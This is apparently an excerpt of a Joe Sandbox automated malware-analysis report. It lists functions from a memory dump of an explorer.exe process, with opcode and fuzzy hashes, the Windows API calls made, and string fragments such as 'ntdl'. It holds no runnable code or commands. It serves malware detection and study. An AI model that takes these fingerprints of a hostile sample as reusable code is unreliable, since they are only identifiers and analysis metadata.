                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000013.00000002.455067690.0000000000891000.00000020.00000001.01000000.00000000.sdmp, Offset: 00891000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_19_2_891000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: 3333$UUUU$UUUU
                                                                                                                                                      • API String ID: 0-1588839328
                                                                                                                                                      • Opcode ID: 0e8f0c4c146071c2570079ad13cd9b927d2608b87e89d9503b1ce95756e49c8e
                                                                                                                                                      • Instruction ID: e4004262e8e754ad97fe433d9968e54a1d6fe1c2a10b3b08569196aadd44a931
                                                                                                                                                      • Opcode Fuzzy Hash: 0e8f0c4c146071c2570079ad13cd9b927d2608b87e89d9503b1ce95756e49c8e
                                                                                                                                                      • Instruction Fuzzy Hash: 6F41BCB16142048BEF188F59C88431277E6FBD9324F59916AEE05CB78AE7B4C985CF80
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000013.00000002.455067690.0000000000891000.00000020.00000001.01000000.00000000.sdmp, Offset: 00891000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_19_2_891000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 7a8d926b658cc580a40ef955d20bc2bc59daf43b2ff7d7c38283f6bfbfef1402
                                                                                                                                                      • Instruction ID: ad25f088a0c9aecd93a2bd40003db80eeb7658259a8ba26d4e9f348f7d0aad67
                                                                                                                                                      • Opcode Fuzzy Hash: 7a8d926b658cc580a40ef955d20bc2bc59daf43b2ff7d7c38283f6bfbfef1402
                                                                                                                                                      • Instruction Fuzzy Hash: 40F11C75E002199BDF18CFA9D880BAEB7B2FF88314F15826EE915E7381D73099058B94
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000013.00000002.455067690.0000000000891000.00000020.00000001.01000000.00000000.sdmp, Offset: 00891000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_19_2_891000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: __floor_pentium4
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 4168288129-0
                                                                                                                                                      • Opcode ID: ba1c417c5f41dc388e49966d63b2d4c853ecc702be54ee8b0e40a70fbaab688e
                                                                                                                                                      • Instruction ID: 2db794a802a08805729838239bdcd996de598cb0b203ca4d55e3729dc8aa8a81
                                                                                                                                                      • Opcode Fuzzy Hash: ba1c417c5f41dc388e49966d63b2d4c853ecc702be54ee8b0e40a70fbaab688e
                                                                                                                                                      • Instruction Fuzzy Hash: F3D21571E086298FDB65DE28DC407EAB7B5FB44304F1446EAD40DEB240EB78AE858F41
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000013.00000002.455067690.0000000000891000.00000020.00000001.01000000.00000000.sdmp, Offset: 00891000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_19_2_891000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _strlen
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 4218353326-0
                                                                                                                                                      • Opcode ID: 7cbdb4c54c80e264799a4e2e3466e5e2f6ae208b956485761e4c659eb70c98eb
                                                                                                                                                      • Instruction ID: 87f888c7f04284289a81fece357fb79311e6df475ee013cae511868d76d5967a
                                                                                                                                                      • Opcode Fuzzy Hash: 7cbdb4c54c80e264799a4e2e3466e5e2f6ae208b956485761e4c659eb70c98eb
                                                                                                                                                      • Instruction Fuzzy Hash: E2E146B05083459FE764CF15C884B6ABBE1FF8A314F148A2DF59983A50D370EA95CF92
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,008E2C95,?,?,00000008,?,?,008E2870,00000000), ref: 008E2F67
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000013.00000002.455067690.0000000000891000.00000020.00000001.01000000.00000000.sdmp, Offset: 00891000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_19_2_891000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ExceptionRaise
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3997070919-0
                                                                                                                                                      • Opcode ID: 3b26ad612b755c133259baba2604d3492c6980c31972fd1588d5071a61d4ad85
                                                                                                                                                      • Instruction ID: 048907171b9596ac0e856f4c054f5f1f09bbae56d3d4dbc590937cca8002ecf1
                                                                                                                                                      • Opcode Fuzzy Hash: 3b26ad612b755c133259baba2604d3492c6980c31972fd1588d5071a61d4ad85
                                                                                                                                                      • Instruction Fuzzy Hash: A6B15C31610649CFD729CF29C48AB657BE0FF46364F258658E89ACF2A2C735ED91CB40
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000013.00000002.455067690.0000000000891000.00000020.00000001.01000000.00000000.sdmp, Offset: 00891000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_19_2_891000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: a
                                                                                                                                                      • API String ID: 0-3904355907
                                                                                                                                                      • Opcode ID: 1bfc0c6bc630824adebd5b529398c32cca4102bd2fba9ee5342244522b16bb83
                                                                                                                                                      • Instruction ID: e6998d71ac1b40e871d5e2c6e639672b61d21681049a4acb62e3cea623f52d9f
                                                                                                                                                      • Opcode Fuzzy Hash: 1bfc0c6bc630824adebd5b529398c32cca4102bd2fba9ee5342244522b16bb83
                                                                                                                                                      • Instruction Fuzzy Hash: E21201706083459FE724CF19C884B2BBBE2FF89308F14892DF58987651D775EA48DB92
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      • FindFirstFileExW.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 008D81CE
                                                                                                                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 008D8249
                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 008D826B
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000013.00000002.455067690.0000000000891000.00000020.00000001.01000000.00000000.sdmp, Offset: 00891000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_19_2_891000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Find$File$CloseFirstNext
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3541575487-0
                                                                                                                                                      • Opcode ID: f0a774ac1aa589f8c7652180fb812ff9238c4529d497949f7748501dabd29bae
                                                                                                                                                      • Instruction ID: 379503331b4a89e644796ace4650bc2f2869a8528b94293cdb4bab9a944c0d61
                                                                                                                                                      • Opcode Fuzzy Hash: f0a774ac1aa589f8c7652180fb812ff9238c4529d497949f7748501dabd29bae
                                                                                                                                                      • Instruction Fuzzy Hash: 8F411472600609EFDB20AFADDC859BFB3A9FF84354F14426AF905D7341EE30AD098660
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 008C158E
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000013.00000002.455067690.0000000000891000.00000020.00000001.01000000.00000000.sdmp, Offset: 00891000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_19_2_891000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FeaturePresentProcessor
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2325560087-0
                                                                                                                                                      • Opcode ID: 509aa1737bbfd59b94a5e21f270ecb55e8c19c3bd4c218a918543763f80fe166
                                                                                                                                                      • Instruction ID: b65ae37163313c6be207236fd574f23eb1d9da18297259165263f6809f3bf2df
                                                                                                                                                      • Opcode Fuzzy Hash: 509aa1737bbfd59b94a5e21f270ecb55e8c19c3bd4c218a918543763f80fe166
                                                                                                                                                      • Instruction Fuzzy Hash: 385169B1A01659CFEB15CF94D8C9BAABBF0FB49320F24806AC501EB252E774E940CF50
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000013.00000002.455067690.0000000000891000.00000020.00000001.01000000.00000000.sdmp, Offset: 00891000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_19_2_891000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: a
                                                                                                                                                      • API String ID: 0-3904355907
                                                                                                                                                      • Opcode ID: 2f32e0eee5bd00c328ef028d7a1ce15141ec3223673ac9d9c098b1f010f69a43
                                                                                                                                                      • Instruction ID: c9e2cf3db68c1a2af0fb5920480fa7fa68e518c97b3922cf2f77c4bca13a557e
                                                                                                                                                      • Opcode Fuzzy Hash: 2f32e0eee5bd00c328ef028d7a1ce15141ec3223673ac9d9c098b1f010f69a43
                                                                                                                                                      • Instruction Fuzzy Hash: 5CE101706083459FE724CF19C884B6BBBE1FF89318F14892DE98AC7A50D774E949CB52
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000013.00000002.455067690.0000000000891000.00000020.00000001.01000000.00000000.sdmp, Offset: 00891000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_19_2_891000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: 0
                                                                                                                                                      • API String ID: 0-4108050209
                                                                                                                                                      • Opcode ID: c5d32cedd4ca215adc6879735b0f81a6ca941c281705a26b7a26ab23d7b162a5
                                                                                                                                                      • Instruction ID: 71bb30adc129bce0260369d0453424cfd3a53889a86fec7b6bcc1fe7d82ae915
                                                                                                                                                      • Opcode Fuzzy Hash: c5d32cedd4ca215adc6879735b0f81a6ca941c281705a26b7a26ab23d7b162a5
                                                                                                                                                      • Instruction Fuzzy Hash: 76C16970900A4A8FCF288E68C491F6EBBF2FB16314B24461DE496DB291C770F9C5CB55
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000013.00000002.455067690.0000000000891000.00000020.00000001.01000000.00000000.sdmp, Offset: 00891000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_19_2_891000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 4a0e41b0a7da178c60eb3bc2783c6ecc3a2d39fc07fbc3406b6db05d12684b2d
                                                                                                                                                      • Instruction ID: 91d50b7b90b446745d7c4393dfb6686ddd64f7467a4a45b8a300c0ff2c0c14b4
                                                                                                                                                      • Opcode Fuzzy Hash: 4a0e41b0a7da178c60eb3bc2783c6ecc3a2d39fc07fbc3406b6db05d12684b2d
                                                                                                                                                      • Instruction Fuzzy Hash: D6828074D0024D8BEF28CB98C9816BDBBB1FB16704F24493AE216EBB51D778D9418B53
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000013.00000002.455067690.0000000000891000.00000020.00000001.01000000.00000000.sdmp, Offset: 00891000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_19_2_891000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 49fc3a9db4aa67236db6233463ef54b47030403b44653fdebf6ffb061f59cdbf
                                                                                                                                                      • Instruction ID: f7d425b549a5e784c22586e7731ba84a846c3fc2fcb93151157bccee96a4b0e1
                                                                                                                                                      • Opcode Fuzzy Hash: 49fc3a9db4aa67236db6233463ef54b47030403b44653fdebf6ffb061f59cdbf
                                                                                                                                                      • Instruction Fuzzy Hash: 426268316087458FD725DF28C080A6AB7E1FF99314F188A6DE4CA9B752D735E846CF42
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000013.00000002.455067690.0000000000891000.00000020.00000001.01000000.00000000.sdmp, Offset: 00891000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_19_2_891000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 2ca6fc406585396305f7d2088fc1ada4ae21cff135d5dff3f52135aa990fa196
                                                                                                                                                      • Instruction ID: 1fd20f598d986d825add95ef824966092ea81bb16fbdd391188be013472f9dfe
                                                                                                                                                      • Opcode Fuzzy Hash: 2ca6fc406585396305f7d2088fc1ada4ae21cff135d5dff3f52135aa990fa196
                                                                                                                                                      • Instruction Fuzzy Hash: 78228CB1508355CFCA24AF1CC8855EEBBE1FBA5314F24882EE585C7362D734D981AB83
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000013.00000002.455067690.0000000000891000.00000020.00000001.01000000.00000000.sdmp, Offset: 00891000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_19_2_891000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 40be53b065b00c4d8c811c47cd04c72b2214bbce686af618a0ab63abe970791a
                                                                                                                                                      • Instruction ID: 3d8fc9e96b84fcfe05abd8d4d895fd7dcf32ace306b09d085290ac4504108c14
                                                                                                                                                      • Opcode Fuzzy Hash: 40be53b065b00c4d8c811c47cd04c72b2214bbce686af618a0ab63abe970791a
                                                                                                                                                      • Instruction Fuzzy Hash: 70129F706087448FD324DF28C88166ABBE2FF96314F548A2DE5D6C7B82E735E845CB46
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000013.00000002.455067690.0000000000891000.00000020.00000001.01000000.00000000.sdmp, Offset: 00891000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_19_2_891000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: a80f90b7c4ee3edd4112f382edf50f88ab92875c20c64800365d68421f9e3b0e
                                                                                                                                                      • Instruction ID: 7b4f0fe2bc16dccd6a9dc12ad036d6e0e9eba1b321c5716cf7dafcc78e9467d6
                                                                                                                                                      • Opcode Fuzzy Hash: a80f90b7c4ee3edd4112f382edf50f88ab92875c20c64800365d68421f9e3b0e
                                                                                                                                                      • Instruction Fuzzy Hash: 6E125371A087059FD714DF29C48066AFBE1FF89314F148A2EE899C7752EB74E8458F82
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000013.00000002.455067690.0000000000891000.00000020.00000001.01000000.00000000.sdmp, Offset: 00891000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_19_2_891000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 81b2ba63fc3c5cc6eb9be6e3903b5664822034862deb9e82cfc3d45cb791d290
                                                                                                                                                      • Instruction ID: f11c7f4fba9696bdcb4f270c54caa4c02510429b768c9d9ea1adae23a4866051
                                                                                                                                                      • Opcode Fuzzy Hash: 81b2ba63fc3c5cc6eb9be6e3903b5664822034862deb9e82cfc3d45cb791d290
                                                                                                                                                      • Instruction Fuzzy Hash: BA020F70510B548FDB28CE29C59862ABBF2FF46710B944A2DD6A78BE90D735F844CB18
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000013.00000002.455067690.0000000000891000.00000020.00000001.01000000.00000000.sdmp, Offset: 00891000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_19_2_891000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: bc98e6877ca80c5c97a2532ef62b1e245aace4fafe747c02335a7366bfc97609
                                                                                                                                                      • Instruction ID: 26bb44ad0ae6357a941b3274d33eeefb51257fd85948841bcdd5b3fb1036b984
                                                                                                                                                      • Opcode Fuzzy Hash: bc98e6877ca80c5c97a2532ef62b1e245aace4fafe747c02335a7366bfc97609
                                                                                                                                                      • Instruction Fuzzy Hash: A2E1A870A80609CFCB24CF68C484FAAB7B1FF49314B648A6DD456DB691EB70ED42CB51
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000013.00000002.455067690.0000000000891000.00000020.00000001.01000000.00000000.sdmp, Offset: 00891000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_19_2_891000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 944e6d26744cf357ffa7d41144c5b8fac39fd1be6bbd3fa2cf353e0e6a1b3533
                                                                                                                                                      • Instruction ID: 3c545f4b4c62828e946f9ec7b3be1c6ca54b08659a55947d649eda9c13196925
                                                                                                                                                      • Opcode Fuzzy Hash: 944e6d26744cf357ffa7d41144c5b8fac39fd1be6bbd3fa2cf353e0e6a1b3533
                                                                                                                                                      • Instruction Fuzzy Hash: B7E19D70600A098FCB28CF68C580F6AB7F1FF45314B24866DE456EB691EB31ED96CB51
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000013.00000002.455067690.0000000000891000.00000020.00000001.01000000.00000000.sdmp, Offset: 00891000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_19_2_891000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: fe52bac06ce16e9f08cb5d1657a55b984f032921874ae6b4bfe86344577606a7
                                                                                                                                                      • Instruction ID: fde4d4d8c2306ee619269a22f50b7b7aca57662aa43fedb6730056e470905788
                                                                                                                                                      • Opcode Fuzzy Hash: fe52bac06ce16e9f08cb5d1657a55b984f032921874ae6b4bfe86344577606a7
                                                                                                                                                      • Instruction Fuzzy Hash: B8E10D76A0830A8FD714CF18C4C066AB7E2FB8A710F59892DE995CB781D735EC46CB81
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000013.00000002.455067690.0000000000891000.00000020.00000001.01000000.00000000.sdmp, Offset: 00891000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_19_2_891000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 0ecdab966b19696b391fd58cb39aa89751dc8c211397caeaf05cf6561b47c73b
                                                                                                                                                      • Instruction ID: 2c6c6702c6eb34c799dc758df8667cba2ad9373f8d2b7fa5d8db0990d351db8e
                                                                                                                                                      • Opcode Fuzzy Hash: 0ecdab966b19696b391fd58cb39aa89751dc8c211397caeaf05cf6561b47c73b
                                                                                                                                                      • Instruction Fuzzy Hash: CFC19970A0865A8FCB28CE68C491F6EBBB1FB05324F24461DD496DB291C735ED49CF51
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000013.00000002.455067690.0000000000891000.00000020.00000001.01000000.00000000.sdmp, Offset: 00891000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_19_2_891000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 77749ee1fbbd0748a5cd56f7bbc26c161fdc5cd406cb9f68b9d7281bcefcd1ad
                                                                                                                                                      • Instruction ID: 968d7270bbece825249889bbb72ffb6fb4c72c3301740f906ddc19aede8f84ff
                                                                                                                                                      • Opcode Fuzzy Hash: 77749ee1fbbd0748a5cd56f7bbc26c161fdc5cd406cb9f68b9d7281bcefcd1ad
                                                                                                                                                      • Instruction Fuzzy Hash: 08C18E70509346AFD714CF28C84469ABFA1FF69304F08865DF8999B782D730DA28CBD6
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000013.00000002.455067690.0000000000891000.00000020.00000001.01000000.00000000.sdmp, Offset: 00891000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_19_2_891000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: dffcfdbef7916ecff17260b097f2326a2b232f334d7e4dee7579234e9330aee5
                                                                                                                                                      • Instruction ID: 7c2af3369fa62c939ebb278010cb6c356f80469f142529f11d678193db0322f8
                                                                                                                                                      • Opcode Fuzzy Hash: dffcfdbef7916ecff17260b097f2326a2b232f334d7e4dee7579234e9330aee5
                                                                                                                                                      • Instruction Fuzzy Hash: 0F514171E00119AFDF14CF99C991BAEBBB6FF88314F19806DE515AB242C7349E50CB91
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000013.00000002.455067690.0000000000891000.00000020.00000001.01000000.00000000.sdmp, Offset: 00891000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_19_2_891000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                                                      • Instruction ID: afaf5e3ee09203b17087780b064d86e0621b526d7b7be07c1a2d6f9b24c47331
                                                                                                                                                      • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                                                      • Instruction Fuzzy Hash: 7711BE7728019243DE148A6D98FCFBAA3B5FBD732172D426EE142CB75AD232E9459600
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000013.00000002.455067690.0000000000891000.00000020.00000001.01000000.00000000.sdmp, Offset: 00891000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_19_2_891000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: cae2cc424bf573f47800d078eede107c22a08c316a2e6c8d7f418b1aa08ecee4
                                                                                                                                                      • Instruction ID: 0c4f8a30d196643ef3ab95e992d1f3267e7184b849d7c952c77d545131652ae4
                                                                                                                                                      • Opcode Fuzzy Hash: cae2cc424bf573f47800d078eede107c22a08c316a2e6c8d7f418b1aa08ecee4
                                                                                                                                                      • Instruction Fuzzy Hash: 5B11A977A182F507D711CFB69CD012AF792FB8B72270F4365DD85EB251C220AC1086E4
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000013.00000002.455067690.0000000000891000.00000020.00000001.01000000.00000000.sdmp, Offset: 00891000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_19_2_891000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 5466edf919cf6453cb3fe632e64b7bc90129a20e483f7dfcae3dbb783ead61c5
                                                                                                                                                      • Instruction ID: 13a2820098f02f59b4e87ac6fa0689ff8307bb858df117462dda7a102b934fb8
                                                                                                                                                      • Opcode Fuzzy Hash: 5466edf919cf6453cb3fe632e64b7bc90129a20e483f7dfcae3dbb783ead61c5
                                                                                                                                                      • Instruction Fuzzy Hash: D4E04632911228EBCB15EB9C890498AB3ACFB49B11B110197B501D3200C270DF00C7D1
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000013.00000002.455067690.0000000000891000.00000020.00000001.01000000.00000000.sdmp, Offset: 00891000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_19_2_891000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: efd915462852245cca9bb77eb0d9cd278e135c9e906a0c69b8f8a86becc92351
                                                                                                                                                      • Instruction ID: 592a23eb5861df46c2b02dbbc1701403f5651cd30e5a52aad4204237fd077f49
                                                                                                                                                      • Opcode Fuzzy Hash: efd915462852245cca9bb77eb0d9cd278e135c9e906a0c69b8f8a86becc92351
                                                                                                                                                      • Instruction Fuzzy Hash: CFC08C384009088ACE2D99949271BA43774F3D1787F80048FC6038BF42CA2FDC86F622
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000013.00000002.455067690.0000000000891000.00000020.00000001.01000000.00000000.sdmp, Offset: 00891000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_19_2_891000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ExitLibraryLoadProcess
                                                                                                                                                      • String ID: Warning$l$l.dl$ntdl
                                                                                                                                                      • API String ID: 2206315515-3352965749
                                                                                                                                                      • Opcode ID: 3613ce8fd6365fddfb472eea749558bb8007319221eb3511cd6cd145f1ccc154
                                                                                                                                                      • Instruction ID: 22e15061e02a2655b62e0b027485590d41d8b816c2e1aab04958540da1d65ba6
                                                                                                                                                      • Opcode Fuzzy Hash: 3613ce8fd6365fddfb472eea749558bb8007319221eb3511cd6cd145f1ccc154
                                                                                                                                                      • Instruction Fuzzy Hash: 2902A271D1421ACB8F24AFACC8845ADBBB0FF49314F684666E915FB350DB748D408B97
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      • type_info::operator==.LIBVCRUNTIME ref: 008DF7DE
                                                                                                                                                      • CatchIt.LIBVCRUNTIME ref: 008DF93D
                                                                                                                                                      • _UnwindNestedFrames.LIBCMT ref: 008DFA3E
                                                                                                                                                      • CallUnexpected.LIBVCRUNTIME ref: 008DFA59
